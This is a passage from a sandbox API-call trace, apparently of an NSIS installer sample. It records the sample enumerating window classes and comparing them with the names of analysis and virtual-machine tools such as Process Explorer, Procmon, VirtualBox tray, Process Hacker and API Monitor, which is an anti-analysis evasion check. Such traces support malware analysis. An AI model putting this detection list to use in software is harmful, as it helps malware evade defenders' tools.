(lpString1="callback1", lpString2="callback1") returned 0 [0158.566] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.566] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.566] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.566] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.566] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.566] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.566] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.567] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.567] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.567] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.567] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.567] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.567] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.567] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.567] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.567] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.567] lstrcpynA (in: lpString1=0x341200, lpString2="131238", iMaxLength=1024 | out: lpString1="131238") returned="131238" [0158.567] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.567] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] GetWindowTextA (in: hWnd=0x200a6, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.568] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.568] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.568] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131238") returned 6 [0158.568] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.568] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.568] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.568] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.568] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.568] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.569] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.569] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.569] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.569] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.569] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.569] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.570] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.570] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.570] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.570] lstrcpynA (in: lpString1=0x3401e0, lpString2="131238", iMaxLength=1024 | out: lpString1="131238") returned="131238" [0158.570] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.570] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.570] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.570] GetClassNameA (in: hWnd=0x200a6, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.570] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.570] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131238") returned 6 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.571] lstrlenA (lpString="0") returned 1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.573] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.573] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrlenA (lpString="") returned 0 [0158.573] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.573] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.573] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrlenA (lpString="") returned 0 [0158.573] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrlenA (lpString="3399936") returned 7 [0158.573] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrlenA (lpString="") returned 0 [0158.574] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrlenA (lpString="") returned 0 [0158.574] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrlenA (lpString="") returned 0 [0158.574] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.574] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.574] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.575] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.575] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.575] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.575] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.575] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.575] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.576] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.576] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.576] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.576] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.576] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.576] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.576] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.576] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.576] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.576] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.576] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.577] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.577] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.577] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrlenA (lpString="0") returned 1 [0158.577] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.577] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.577] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.577] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrlenA (lpString="0") returned 1 [0158.577] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrlenA (lpString="") returned 0 [0158.577] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.578] lstrlenA (lpString="3399936") returned 7 [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.578] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrlenA (lpString="") returned 0 [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrlenA (lpString="") returned 0 [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrlenA (lpString="") returned 0 [0158.578] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, 